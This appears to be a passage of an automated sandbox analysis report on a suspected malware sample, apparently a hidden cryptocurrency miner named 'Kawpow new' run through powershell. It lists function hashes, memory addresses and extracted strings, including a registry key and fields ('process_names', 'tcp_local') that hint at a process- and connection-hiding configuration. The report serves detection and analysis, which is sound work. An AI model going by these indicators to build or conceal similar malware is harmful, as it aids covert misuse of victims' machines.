                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e538c953a5b5ba5f2f37d1458072cc66c2ffacda0c9b9076b10d6db8c3e7f049
                          • Instruction ID: e031ef014cf9671b619519d7b60cf386dead27d27ccbf0205db22d022cf191c1
                          • Opcode Fuzzy Hash: e538c953a5b5ba5f2f37d1458072cc66c2ffacda0c9b9076b10d6db8c3e7f049
                          • Instruction Fuzzy Hash: 6DF05E7060A3404FD7619BB8D8987D67FB1EB42310F0448AAD95ACB692CB392985CB51
                          Function 049ADFB8 Relevance: .0, Instructions: 30COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d8f3205c765beea2c90eaed2d7c88c3941bbbda5974a38f4b88ea0d94258c0d5
                          • Instruction ID: c6c5e392523dbd1a77a6a94044b0369d72f9f98376c6dff74ef7b73e93ddd427
                          • Opcode Fuzzy Hash: d8f3205c765beea2c90eaed2d7c88c3941bbbda5974a38f4b88ea0d94258c0d5
                          • Instruction Fuzzy Hash: C1E0E5357501118F87109B1DD498C27B7FBEFCE62932911AAF54ADB735DA61EC01CB90
                          Function 049ADE48 Relevance: .0, Instructions: 29COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1289931dc22db815488b46ddda0a74906e6a9223a2080b52e7b6b3540f1c1d8c
                          • Instruction ID: 055f9946d1e289e7f754d909cd4e5de98a50c51651b2f0d36e1195286c26da76
                          • Opcode Fuzzy Hash: 1289931dc22db815488b46ddda0a74906e6a9223a2080b52e7b6b3540f1c1d8c
                          • Instruction Fuzzy Hash: 10E0E531B15180ABC7089768E8848E9BF639BC8320B0484BEE457ABA21D9215916C791
                          Function 049A9629 Relevance: .0, Instructions: 28COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: bbf40081e2eef78af00f41f97b60ab57d084d0046b15153b2c8dc7098ce8056d
                          • Instruction ID: 62a4dca10490d556c191ebaa3afed2928224b31995ec643c61216ce3cef2807c
                          • Opcode Fuzzy Hash: bbf40081e2eef78af00f41f97b60ab57d084d0046b15153b2c8dc7098ce8056d
                          • Instruction Fuzzy Hash: 1FE0266270605017974572B80A107B6588F9FD61B5B0E067F8639EB2C0DE04EC2143E1
                          Function 049A8A4A Relevance: .0, Instructions: 27COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cc7431d538393ad61f37caf451e54efaf2b50cd9304f1054f523952ef9aab421
                          • Instruction ID: 9a06dc2c02d87b61873c116ca8a40045272368000222f32597a70edc009d43e0
                          • Opcode Fuzzy Hash: cc7431d538393ad61f37caf451e54efaf2b50cd9304f1054f523952ef9aab421
                          • Instruction Fuzzy Hash: 1AF0E5353093904FC70A2B74991C1DD2E629BD5225F09406FD905C7283CE28591583D6
                          Function 049AB078 Relevance: .0, Instructions: 26COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3858d0d10f641e05fdd37c080a655157ce3c68d552fb408691f088ecb19b7972
                          • Instruction ID: 8a0dbec3c51316c9cd5a540034eb7c8b9c3f4c895da94fbde30d7a304cf3099a
                          • Opcode Fuzzy Hash: 3858d0d10f641e05fdd37c080a655157ce3c68d552fb408691f088ecb19b7972
                          • Instruction Fuzzy Hash: CEE0862570D2D01B9717923D64605A66FE68ACB26031DC4FED485CF257C8428C078362
                          Function 049A9250 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba83b4b0de1848c605791c77327377df2e2fb66fb45bb2cb1a447f475c763609
                          • Instruction ID: 17c43509a258f53ebf56dec3b41a87c271b7eaaff33e6d9f92073930691cf810
                          • Opcode Fuzzy Hash: ba83b4b0de1848c605791c77327377df2e2fb66fb45bb2cb1a447f475c763609
                          • Instruction Fuzzy Hash: 29F06D709013044FD3609FB8D89839A7BE9FB44310F00482DD90EC7280DB397880CB90
                          Function 049AF940 Relevance: .0, Instructions: 25COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: cd64836f0ec11d10afc36e556ae3e7f34238ad7b87151eb43c95b99f42aed910
                          • Instruction ID: db5f4e258d9f6236c2a49d0e8756bf8ba9b44e53ca500bc1d10135716bc38856
                          • Opcode Fuzzy Hash: cd64836f0ec11d10afc36e556ae3e7f34238ad7b87151eb43c95b99f42aed910
                          • Instruction Fuzzy Hash: B5E06D749002499FC741DFB9C4422A9FFF0EF89210B5088AEC948DB202E6325952CBD2
                          Function 049A8A58 Relevance: .0, Instructions: 24COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ac07df139361ba9579a835b218cd47230a4e3b6c29c5b1c859634ea629b04023
                          • Instruction ID: ec2edc4ca77b75432308bf2c5a1fbc4d1c3fb770c35bb88f9d33d83d3466b507
                          • Opcode Fuzzy Hash: ac07df139361ba9579a835b218cd47230a4e3b6c29c5b1c859634ea629b04023
                          • Instruction Fuzzy Hash: E0E0263A3047104BCB083B78A80C2EE7A56EBD4724F04402EEE0A83381CF7C291183D6
                          Function 049A9638 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7c192e7ddf074c8ff5475302bf5634c815a06a49b75b2ac327e2615364ee1b0c
                          • Instruction ID: b6b341c7416b90cc500bc6392c384becc8fb3c99feb5c0eb252579314917b9d1
                          • Opcode Fuzzy Hash: 7c192e7ddf074c8ff5475302bf5634c815a06a49b75b2ac327e2615364ee1b0c
                          • Instruction Fuzzy Hash: 62D05E52701129171B58B0BA59146BBA5CFDED54A570A053E9B18EB241EF44EC2103F1
                          Function 049ADE08 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ab29c367b53b59942e1d2d4f7be83480cf56b9bfbac8d3ca9d0959dc2bd08b0f
                          • Instruction ID: 6a20aa1c0a4a53cc8eb6c15ea1bbfaf180c4c6700677e6795d8a76d23ef7f685
                          • Opcode Fuzzy Hash: ab29c367b53b59942e1d2d4f7be83480cf56b9bfbac8d3ca9d0959dc2bd08b0f
                          • Instruction Fuzzy Hash: ADE0C232701714578655661EB80089FB7EFDFC6671310853EE41AC7740EE68EC0587D6
                          Function 049ADE58 Relevance: .0, Instructions: 23COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction ID: 981f4d61522bf5a0adf50a64a6c2ef77060dcf15bf083b4faecf17fe40065131
                          • Opcode Fuzzy Hash: fd4c8d452a5771c60ee91f320fcc0371df8875e812d4233fbae53c791bb77087
                          • Instruction Fuzzy Hash: 0BE08635B10114978B089559D8504DDF7ABDBCC220F04C47AD90AA7744DA32691686E1
                          Function 049A8819 Relevance: .0, Instructions: 20COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ed32c71a5052ee7a8ceec681779639af5f0f001770019857d0c558d8159726b2
                          • Instruction ID: 39937828141d431829a4e67e4ff8d1fe35898e44fbd8c0f81f1704aceab8e1a2
                          • Opcode Fuzzy Hash: ed32c71a5052ee7a8ceec681779639af5f0f001770019857d0c558d8159726b2
                          • Instruction Fuzzy Hash: C6E08631A06149DBDB09FBB4ED5A8FD7F31EB11311B0005ADE96352451EA74159ACB80
                          Function 049A88E0 Relevance: .0, Instructions: 19COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9d9cfb343b8fbd4cd54316392238f881e394c091e0c096faef1aada789b9ef5
                          • Instruction ID: 767d09a92741d05d5c42be8d3de11ad4b6e49950ded90933ffff7767ad2916b8
                          • Opcode Fuzzy Hash: f9d9cfb343b8fbd4cd54316392238f881e394c091e0c096faef1aada789b9ef5
                          • Instruction Fuzzy Hash: BCE02634A052469BC704EFA8D9458BEBFB1EB41300B00419EEC0992701D6305851CBC1
                          Function 049AF950 Relevance: .0, Instructions: 16COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction ID: 8a5bcfe6015da6a084002187cb6737de405cdb6079ddfb625983656ac3f80441
                          • Opcode Fuzzy Hash: a0679d7c354d51605d8bd13a266064c3acceb09603bccb70a5f4b130bfb080f8
                          • Instruction Fuzzy Hash: C9D06270D042099F8780DFADC94156DFBF4EB49204F5085BA8919D7301F73156128FD1
                          Function 049A88F0 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: accdef28b7870e9c689dee831601aa91c27760b233bdabe43a67bcb17889cf52
                          • Instruction ID: a9f49fc909856c8edea120d15821ca625d637b474e39994dde11501ad94bf8b3
                          • Opcode Fuzzy Hash: accdef28b7870e9c689dee831601aa91c27760b233bdabe43a67bcb17889cf52
                          • Instruction Fuzzy Hash: 6FD01738A0520A9F8B18EFA8E8469BEBBB5EB44201F008169ED4993340EA306851CBC1
                          Function 049A8828 Relevance: .0, Instructions: 15COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c6bc62440cde0d350af00c8b2f089216b81846607d2781d20d3978df818adb5
                          • Instruction ID: 98c109b97ce365e35b9100c1eaff1b16465ae499be5a5dc1b776bcf28464f788
                          • Opcode Fuzzy Hash: 8c6bc62440cde0d350af00c8b2f089216b81846607d2781d20d3978df818adb5
                          • Instruction Fuzzy Hash: 7ED06731905209DBCB08FBA4E85A4FEBB34FB14301F40456DED2752191EE352A5ACAC5
                          Function 049A7A00 Relevance: .0, Instructions: 14COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eb9e61085595a38feee6755e0e4748a9083af2f3c0b0540cc8b2ab8e4e013413
                          • Instruction ID: c03ab189b885e18ff8031a7fa74a5789dcec5f4067ad02b36b04164b8ab4e228
                          • Opcode Fuzzy Hash: eb9e61085595a38feee6755e0e4748a9083af2f3c0b0540cc8b2ab8e4e013413
                          • Instruction Fuzzy Hash: 43D0123840A388AFC7165BB994414683F24BE0221570808E9D5490F26399B3C845CB80
                          Function 049A7F71 Relevance: .0, Instructions: 11COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63778c95489c1be664960c11f5c4a74707cb20fd611c08596a5f08811ecc21a8
                          • Instruction ID: 1f9321c56267af3797eb5863cc5308216261d7c1743c68586a234feed66eb04d
                          • Opcode Fuzzy Hash: 63778c95489c1be664960c11f5c4a74707cb20fd611c08596a5f08811ecc21a8
                          • Instruction Fuzzy Hash: A1C0122080D3E06FEF0397388985A093FB08E43A8530944C2C2808A067C5288848C712
                          Function 049A7A08 Relevance: .0, Instructions: 8COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a0e0371a8824cf51a60ba52624fb1c6b75909b0a6b532196e9bb9cdc3990c532
                          • Instruction ID: be01c85b0e6160652f2730f0074144b8408b320a93827eb0781b9c20e5b52754
                          • Opcode Fuzzy Hash: a0e0371a8824cf51a60ba52624fb1c6b75909b0a6b532196e9bb9cdc3990c532
                          • Instruction Fuzzy Hash: 7BB0923004470C8FC2086FB6A404828732DBA4020578408E9E41A0B2A78E77E840CA44

                          Non-executed Functions

                          Function 07351BE0 Relevance: 20.4, Strings: 16, Instructions: 410COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $cBk$4'jq$4'jq$4'jq$4'jq$84Ml$84Ml$tPjq$tPjq$JPl$JPl$JPl$JPl$JPl$rOl$rOl
                          • API String ID: 0-314082401
                          • Opcode ID: 3177145d3033ff0d63c5ae24748f8bddfa126f78e0a509136cd208f681c2d404
                          • Instruction ID: 7580803939690297629828e96b99ae6a9b381613d415cce269f0b528f3f078db
                          • Opcode Fuzzy Hash: 3177145d3033ff0d63c5ae24748f8bddfa126f78e0a509136cd208f681c2d404
                          • Instruction Fuzzy Hash: 8ED14BB2B052098FEB219B689410FABFBF6EFC5211F14846BCD59CB255DB31C845C7A2
                          Function 07353678 Relevance: 8.9, Strings: 7, Instructions: 184COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq$$jq$El$El
                          • API String ID: 0-2108968551
                          • Opcode ID: 8234a58c66b03d5eb74d96a1cba1e36c69930cc5487ac01c86937b0d91e50a4a
                          • Instruction ID: 80932fd71f8c06b82768533f5d58d37cc13120e7de9f10f9028d5a1bab1fdbeb
                          • Opcode Fuzzy Hash: 8234a58c66b03d5eb74d96a1cba1e36c69930cc5487ac01c86937b0d91e50a4a
                          • Instruction Fuzzy Hash: 8B516BF1B043469FEB248A398410F66BBA6EFC22A4F24847FDC4DCB251DA35C845C7A1
                          Function 049A7AE8 Relevance: 6.5, Strings: 5, Instructions: 237COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: 5a75ed98178eaa0a4d27f8880fbc1ccc484157177420a5d10c891c5509858871
                          • Instruction ID: 5c6084ae54ee0edfed480bd9c83185775d5bb4108a33a80228193fcfb84f1bd4
                          • Opcode Fuzzy Hash: 5a75ed98178eaa0a4d27f8880fbc1ccc484157177420a5d10c891c5509858871
                          • Instruction Fuzzy Hash: 1AB1C674E002099FDB54DFA9D980A9DFBF6FF88304F10862AD819AB355DB34A905CF90
                          Function 049A7AF8 Relevance: 6.5, Strings: 5, Instructions: 234COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: tMOl$`kq$`kq$`kq$`kq
                          • API String ID: 0-3148330094
                          • Opcode ID: 3fd396a23b67c238fe71d13f99ae8d2258d103ae13f9a2c290520d98ed7af92e
                          • Instruction ID: 326b28ed3d36ef04f0c7e8d5f6990e300647bb4c8a2464ec8bdccd2d1a7682b5
                          • Opcode Fuzzy Hash: 3fd396a23b67c238fe71d13f99ae8d2258d103ae13f9a2c290520d98ed7af92e
                          • Instruction Fuzzy Hash: EAB1C674E002099FDB54DFA9D980A9DFBF6FF88304F108629D819AB354EB34A905CF90
                          Function 07351EF8 Relevance: 6.3, Strings: 5, Instructions: 81COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$84Ml$tPjq$JPl$JPl
                          • API String ID: 0-3586433588
                          • Opcode ID: d5bff935c7968ee1a1abdb926f4eca72a9ba65b539341a8df6a202ec04cc2814
                          • Instruction ID: bff375b3c41e489f89d23c3179aa3d17354556601d962bedd9a6ccd3a26156a9
                          • Opcode Fuzzy Hash: d5bff935c7968ee1a1abdb926f4eca72a9ba65b539341a8df6a202ec04cc2814
                          • Instruction Fuzzy Hash: 7E21B1F1A0620ADBEB209E44C841F27F7A6BF81711F1982A6DE0C5B151C372D840C7A2
                          Function 07355798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$$jq$$jq
                          • API String ID: 0-2428501249
                          • Opcode ID: 72eefde23ce1a6212246001034dd9c77aa874a881c817a52b6cd59470c60bbea
                          • Instruction ID: b3b15bb1776eaffe6667bcbaadd6ea0ec9c8342af616e93233ba44ca62cd3c70
                          • Opcode Fuzzy Hash: 72eefde23ce1a6212246001034dd9c77aa874a881c817a52b6cd59470c60bbea
                          • Instruction Fuzzy Hash: AA2149B13143169BEB34992AC800F27B7DBAFC1711F24843A9D09DB781DD36E8118371
                          Function 07350308 Relevance: 5.0, Strings: 4, Instructions: 50COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: 4'jq$4'jq$$jq$$jq
                          • API String ID: 0-1496060811
                          • Opcode ID: 35398f1b369980f01810730d7612e17dedf7c3109aad19ff5bf4587093df47ff
                          • Instruction ID: 7e50a7482f71399b43bb1f5a70da9310af64a5e4ad6279dcdb26a3cb7de1bc15
                          • Opcode Fuzzy Hash: 35398f1b369980f01810730d7612e17dedf7c3109aad19ff5bf4587093df47ff
                          • Instruction Fuzzy Hash: 8601F76030A3969FD32B537858209667F769FC3710B2A40EBC884DF297C9278D05C3A7
                          Function 07352108 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID: $jq$$jq$JPl$JPl
                          • API String ID: 0-131527678
                          • Opcode ID: 39ac2d604925afa7468081a5cc2fdada9e0893b49f62e5a3bc6f902c08c6a1e9
                          • Instruction ID: a5d1030811b81e05b4050102f8759f177cfcfc3bd07538d0c075f05d9b95ee48
                          • Opcode Fuzzy Hash: 39ac2d604925afa7468081a5cc2fdada9e0893b49f62e5a3bc6f902c08c6a1e9
                          • Instruction Fuzzy Hash: 01012BF261E3818FD327462C9C109576FABAFD3610B1D81EBC948DF666C5398D04C3A6

                          Execution Graph

                          Execution Coverage:0.3%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:3
                          Total number of Limit Nodes:0
                          execution_graph 14722 27e82473844 14723 27e82473851 StrCmpNIW 14722->14723 14724 27e82473866 14722->14724 14723->14724

                          Executed Functions

                          Function 0000027E82473844 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 15COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 27e82473844-27e8247384f 1 27e82473851-27e82473864 StrCmpNIW 0->1 2 27e82473869-27e82473870 0->2 1->2 3 27e82473866 1->3 3->2
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID: dialer
                          • API String ID: 0-3528709123
                          • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction ID: 26eb1e06ae24d8eeb0f125595e0b40c4b0d4bdc1d5ac12d4f5ea3e40cf336c0e
                          • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                          • Instruction Fuzzy Hash: 37D0A760725309CAFF54DFA6C8CCA622798EB0C744F8E80A0C92805270DB688D8D9731
                          Function 0000027E8232273C Relevance: .2, Instructions: 187COMMON
                          Download Yara Rule

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000013.00000002.2237372173.0000027E82320000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000027E82320000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82320000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction ID: a3b171aca9dadbfd4afe885cd0f4ad7b3c1a8a407c07e7c1c8ac0a6061d1ccb0
                          • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                          • Instruction Fuzzy Hash: 96615632B056918BDF54CF15C82472E73AAF758B95F198122DE2D23798CA38DC62C721
                          Function 00007FF762151140 Relevance: .0, Instructions: 4COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 52 7ff762151140-7ff762151151 call 7ff762151160
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238536709.00007FF762151000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF762150000, based on PE: true
                          • Associated: 00000013.00000002.2238491241.00007FF762150000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000013.00000002.2238817218.00007FF76215C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000013.00000002.2238926005.00007FF76215F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000013.00000002.2238972907.00007FF762160000.00000008.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000013.00000002.2239873220.00007FF762654000.00000004.00000001.01000000.0000000D.sdmpDownload File
                          • Associated: 00000013.00000002.2239936886.00007FF76268C000.00000002.00000001.01000000.0000000D.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_7ff762150000_Kawpow new.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction ID: f8802c7f46f3e18d493061fe55dac9e317d60afcb7c76c7d434fbcdbb3885cce
                          • Opcode Fuzzy Hash: 808f824871d7e1a8eee0a1093264b3d0fd75ff3502bae8c0f48d855cf6986489
                          • Instruction Fuzzy Hash: 32B092B4908209C4EA493F29E88125962606B08740F8004A0C40C62392CAAD5040CB20

                          Non-executed Functions

                          Function 0000027E82471628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000013.00000002.2238379617.0000027E82470000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000027E82470000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_19_2_27e82470000_Kawpow new.jbxd
                          Similarity
                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                          • API String ID: 106492572-2879589442
                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
